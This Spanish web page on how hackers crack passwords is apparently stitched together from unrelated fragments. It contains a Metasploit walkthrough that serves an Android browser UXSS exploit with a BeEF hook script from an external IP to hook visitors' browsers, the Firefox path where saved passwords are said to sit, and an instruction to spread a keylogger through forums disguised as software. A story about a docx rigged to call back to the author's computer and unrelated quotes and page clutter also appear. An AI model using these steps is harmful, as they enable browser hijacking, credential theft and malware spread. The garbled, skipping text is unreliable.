Así es como los hackers descifran las contraseñas
Paso 1: Abrir MetasploitComencemos por encender Kali y luego abrir Metasploit escribiendo:kali > msfconsoleDeberías obtener una pantalla como esta. Para aquellos que no están familiarizados con Metasploit, echa un vistazo a mi serie sobre el uso de Metasploit para obtener más información sobre su uso con éxito.
Paso 2: Encontrar el exploitA continuación, vamos a encontrar el exploit para este hack escribiendo:msf > search platform:android stock browserCuando lo hacemos, obtenemos sólo un módulo:auxiliary/gather/android_stock_browser_uxssCarguemos ese módulo escribiendo:msf > use auxiliary/gather/android_stock_browser_uxss
Paso 6: Establecer JS a BeEF HookVolvemos a Metasploit ahora. Tenemos que establecer el REMOTE_JS al gancho en BeEF. Por supuesto, asegúrese de utilizar la IP del servidor que se ejecuta en BeEF.msf > set REMOTE_JS http://192.168.1.107:3000/hook.js A continuación, tenemos que establecer el URIPATH al directorio raíz /. Vamos a escribir:msf > set uripath /
Paso 7: Ejecutar el servidorAhora tenemos que iniciar el servidor web de Metasploit. Lo que ocurrirá ahora es que Metasploit iniciará su servidor web y servirá el hook de BeEF para que cuando alguien navegue a esa web, tenga su navegador enganchado a BeEF.msf > run
Aprenda a descifrar contraseñas mediante un ataque de fuerza bruta
Este hack se basa en el hecho de que la mayoría de nosotros queremos que los sitios web nos recuerden cuando volvemos. No queremos poner nuestro nombre de usuario y contraseña cada vez que queremos acceder al sitio, así que le decimos al navegador que «me recuerde». De este modo, no tenemos que volver a autenticarnos y proporcionar nuestra contraseña, nuestro sistema simplemente la recuerda y se la proporciona al sitio web.Por supuesto, esas contraseñas deben estar almacenadas en algún lugar de nuestro ordenador. La clave es saber dónde se almacenan esas contraseñas y cómo descifrar las contraseñas cifradas cuando las encontremos. Por ejemplo, Mozilla almacena las contraseñas de los usuarios en:c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entriesComo puedes ver en la captura de pantalla de abajo, he mostrado ese directorio y los hashes de las contraseñas de un ordenador con Windows 7 que ejecuta Firefox 36. Estas son todas las contraseñas guardadas de varios sitios web que Firefox ha almacenado. Tenga en cuenta que la ubicación de estas contraseñas está en diferentes lugares para cada navegador y, a veces en diferentes lugares en diferentes sistemas operativos con el mismo navegador. Busque más sobre este tema en mi serie de Forense Digital en un futuro próximo.
Cómo hackeé a mi amiga sin que se diera cuenta – Operación Luigi
«Creo que es una propuesta bastante triste para ser honesta», dijo al sitio web. «Lo miré y sentí que había una tristeza real en torno a la soledad humana. ¿Quién querría hacer esto si no fuera por diversión?», añadió.
«Hay demasiadas cosas desde el punto de vista de la protección de la identidad, de la privacidad, del uso de la red con las mejores prácticas en términos de seguridad y protección en línea, de ayudar a los jóvenes a utilizarla de forma positiva y de utilizar las redes sociales de forma positiva. Esto abre la puerta a que salten graves problemas», añadió.
2. Ahora difunde tu keylogger por los foros. Puede que sea miembro de varios foros y los utilice para difundir su keylogger en forma de mensajes de software. Puede utilizar varios programas para difundirlos que los usuarios descargan con frecuencia.
Cuando veas los elementos de tu lista de lectura, se marcarán automáticamente como leídos a medida que te desplaces hacia abajo (cuando estés en la vista «Expandida»). Si prefieres desactivar esta función, puedes desactivarla enConfiguración.
Curso completo de hacking ético en 3 horas
Sabía que se trataba de un reto importante; no sólo es una de las tecnologías que más medidas de seguridad ha implementado, sino que durante años muchos expertos en seguridad han estado informando y parcheando nuevos agujeros. La empresa había llegado a afirmar que todos los agujeros de sus servidores habían sido parcheados. Pero se equivocaba.
Los archivos docx son archivos comprimidos y los datos que contienen pueden modificarse si se descomprimen. Así que Ramadan cogió un archivo .docx y lo descomprimió (con el programa 7-zip) para acceder a su código y modificarlo. Más concretamente, cambió una línea de código para ordenar a este documento de Word que se comunicara con un archivo gemelo alojado en su ordenador, dondequiera que estuviera.
A pesar de su buena idea, Ramadan era consciente de que podía fallar. Era probable que, aunque el documento modificado se enviara al servidor, el archivo no pudiera comunicarse con el archivo gemelo de su ordenador.
Panda Security está especializada en el desarrollo de productos de seguridad para puntos finales y forma parte de la cartera de soluciones de seguridad informática de WatchGuard. Inicialmente centrada en el desarrollo de software antivirus, la empresa ha ampliado desde entonces su línea de negocio a servicios avanzados de ciberseguridad con tecnología para prevenir la ciberdelincuencia.